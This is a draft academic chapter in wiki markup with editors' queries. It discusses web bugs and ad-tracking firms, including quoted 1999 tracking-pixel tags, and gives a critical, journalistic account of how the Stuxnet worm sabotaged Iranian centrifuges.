&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm mean that at least thirty people would have been working on it simultaneously to build such a worm (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b) and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, (315), was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, (417), manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The name Stuxnet origin is hypothesized from an analysis of the approximately 15,000 lines of programming code. This was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
